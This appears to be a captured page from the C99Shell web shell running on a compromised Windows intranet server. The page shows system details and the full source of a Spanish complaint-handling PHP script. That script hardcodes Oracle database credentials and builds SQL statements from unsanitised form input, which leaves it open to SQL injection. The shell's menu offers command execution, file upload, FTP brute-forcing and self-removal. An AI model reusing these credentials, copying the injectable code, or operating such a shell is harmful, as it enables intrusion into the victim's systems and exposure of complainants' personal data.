!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Intranet\C\xampp\htdocs\php\Copia de quejas2006\   drwxrwxrwx
Free 4.09 GB of 39.52 GB (10.36%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     procesasegunda.php (5.8 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?
$Vanonimo= $_POST['anonimo'];
if(($Vnom=="")&&($Vid=="")&&($Vanonimo=="")) {
$anonimo="";
}else{
$anonimo=$anonimo;
}
if ($anonimo=="on") {
            $anonimo1="SI";
                        } else {
            $anonimo1="NO";
            }?>
<?php
$ses 
= isset($usuario);
if (
$ses == false) {
$usuario "EMAIL";
}
$de = isset($loc);
if (
$de == false) {
$loc 0;
}
$db "sia";
$c1 OciLogon("EMAIL","EMAIL2003",$db);
?>
<?
session_start();
if (isset($_SESSION['nombre'])) {
$_SESSION['nombre']=$_SESSION['nombre'];
}
else{
$_SESSION['nombre']=strtoupper($_POST['nombre']);
}
if (isset($_SESSION['kindid'])) {
$_SESSION['nombre']=$_SESSION['kindid'];
}
else{
$_SESSION['kindid']=strtoupper($_POST['kindid']);
}

if (isset($_SESSION['id'])) {
$_SESSION['id']=$_SESSION['id'];
}
else{
$_SESSION['id']=$_POST['id'];
}

if (isset($_SESSION['direccion'])) {
$_SESSION['direccion']=$_SESSION['direccion'];
}
else{
$_SESSION['direccion']=$_POST['direccion'];
}

if (isset($_SESSION['telefono'])) {
$_SESSION['telefono']=$_SESSION['telefono'];
}
else{
$_SESSION['telefono']=$_POST['telefono'];
}

if (isset($_SESSION['email'])) {
$_SESSION['email']=$_SESSION['email'];
}
else{
$_SESSION['email']=$_POST['email'];
}

if (isset($_SESSION['anonimo'])) {
$_SESSION['anonimo1']=$_SESSION['anonimo1'];
}
else{
$_SESSION['anonimo1']=$anonimo1;
}
?>
<?
$Vnom= $_POST['nombre'];
$Vid= $_POST['id'];
//
if (($Vnom=="")&&($Vid=="")&&($anonimo1=="SI")) {
        $nombrelleno="Anónimo PURO... contacto_id=17186";
        $codigoRAD = 17186;
        $nombreRAD = "DENUNCIANTE ANÓNIMO";
        //$tipoDEN servirá para saber qué datos mostrar en el encabezado DENUNCIANTE DEL FORMULARIO
        $tipoDEN=1;
        } elseif(($Vnom!=="")&&($anonimo1=="SI")&&($Vid=="")) {
        $nombrelleno="Anónimo SOLO NOMBRE... contacto_id=17186";
        $codigoRAD = 17186;
        $tipoDEN=2;
        $nombreRAD = "DENUNCIANTE ANÓNIMO";
        } elseif(($Vid!=="")&&($anonimo1=="SI")&&($Vnom=="")) {
        $nombrelleno="Anónimo SOLO DOCUMENTO... contacto_id=17186";
        $codigoRAD = 17186;
        $tipoDEN=3;
        $nombreRAD = "DENUNCIANTE ANÓNIMO";
        } elseif(($Vid!=="")&&($Vnom!=="")) {
        $nombrelleno="TENGO ID Y NOMBRE... CONSULTO ORACLE";
        //Verifico sí existe dentro del sistema
            $consulta = ociparse($c1,"SELECT C.CONTACTO_ID, C.NOMBRE FROM CONTACTO C WHERE C.IDENTIFICACION = '$Vid'");
            OCIExecute($consulta);
    //----------------------------------------
$nrows = oci_fetch_all($consulta, $results);
if ($nrows > 0) {
   foreach ($results as $key => $val) {
     if($key == 'CONTACTO_ID'){
         $codigoRAD = $val[0];
        $tipoDEN=4;
     }
     if($key == 'NOMBRE'){
         $nombreRAD = $val[0];
     }
   }
//   echo "OK En Base de Datos<br />";
//   echo "CONTACTO_ID: " . $codigoRAD . "<br />";
//   echo "     NOMBRE: " . $nombreRAD . "<br />";
} else {
//   echo "No data found<br />\n";
   $codigoRAD="Código por asignar" ;
//*********************************
// Eejecutar paquete SIACONTACTO
// Precondicion: Debe tener Nombre, identificacion y (Direccion o Correo)
// Ejecucion: CALL ?†?SIACONTACTO('C', NULL, NOMBRE, IDENTIFICACION, NULL, TELEFONO, DIRECCION, EMAIL, NULL, NULL, NULL, NULL, NULL, NULL)
// Resultado: Si se logra la insercion un Nuevo CONTACTO_ID
//*****************************
$Vtelefono= $_POST['telefono'];
$Vdireccion= $_POST['direccion'];
$Vemail= $_POST['email'];

$sqlstr = "CALL SIACONTACTO('C', NULL, '$Vnom', '$Vid', NULL, ";
    if($Vtelefono!== ""){
    $sqlstr = $sqlstr . "'".$Vtelefono."', ";
    } else {
    $sqlstr = $sqlstr . "NULL, ";
    }
    if($Vdireccion!== ""){
    $sqlstr = $sqlstr . "'".$Vdireccion."', ";
    } else {
    $sqlstr = $sqlstr . "NULL, ";
    }
    if($Vemail!== ""){
    $sqlstr = $sqlstr . "'".$Vemail."', ";
    } else {
    $sqlstr = $sqlstr . "NULL, ";
    }
$sqlstr= $sqlstr . "NULL, NULL, NULL, NULL, NULL, NULL)";
/////__________________________CONSULTA
$consultaInsercion = ociparse($c1,$sqlstr);
OCIExecute($consultaInsercion);
/////
$consulta = ociparse($c1,"SELECT C.CONTACTO_ID, C.NOMBRE FROM CONTACTO C WHERE C.IDENTIFICACION = '$Vid'");
            OCIExecute($consulta);
//--------CONSULTO EL USUARIO QUE ACABO DE CREAR A TRAVÉS DE SU ID
$nrows = oci_fetch_all($consulta, $results);
if ($nrows > 0) {
   foreach ($results as $key => $val) {
     if($key == 'CONTACTO_ID'){
         $codigoRAD = $val[0];
     }
     if($key == 'NOMBRE'){
         $nombreRAD = $val[0];
     }
   }
//   echo "OK En Base de Datos<br />";
//   echo "CONTACTO_ID: " . $codigoRAD . "<br />";
//   echo "     NOMBRE: " . $nombreRAD . "<br />";
} else {
//   echo "No data found<br />\n";
   $codigoRAD="ERROR INSERTANDO" ;
   }
//////_________________________CONSULTA

}
oci_free_statement($consulta);
//-------------------------------------------------------
        //oci_fetch_all Me ayuda a saber si la consulta me trajo O NO filas
    //                $registros = oci_fetch_all($consulta, $results);
    //                if ($registros > 0) {
    //                    for ($i; $i<$registros; $i++) {
    //                    $codigoRAD = $results[0];
    //                    $nombreRAD = $results[1];
    //                    }
                            // echo "<td>$data[$i]</td>\n";

                        //while (OCIFetchInto($consulta, $cur)) {
                        //$codigoRAD = $cur[0];
                        //$nombreRAD = $cur[1];
                        //}
//                    } else {
//                    $codigoRAD="Código por asignar" ;
//                        }

//-----------------------------------------------------------
        }else{
        $nombrelleno="ALGO EXISTE";
}
/// SELECT C:CONTACTO_ID, C.NOMBRE FORM CONTACTO C WHERE C.IDENTIFICACION = '$id'
//if ($anonimo=="on") {
//            $anonimo1="ANÓNIMO = SI";
//                        } else {
//            $anonimo1="ANÓNIMO = NO";
//            }
?>
<?
//codigoRAD - nombreRAD
if (isset($_SESSION['codigoRAD'])) {
$_SESSION['codigoRAD']=$_SESSION['codigoRAD'];
}
else{
$_SESSION['codigoRAD']=$codigoRAD;
}
if (isset($_SESSION['tipoDEN'])) {
$_SESSION['tipoDEN']=$_SESSION['tipoDEN'];
} else{
$_SESSION['tipoDEN']=$tipoDEN;
}
?>
<?php
header
("location: segunda.php");
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--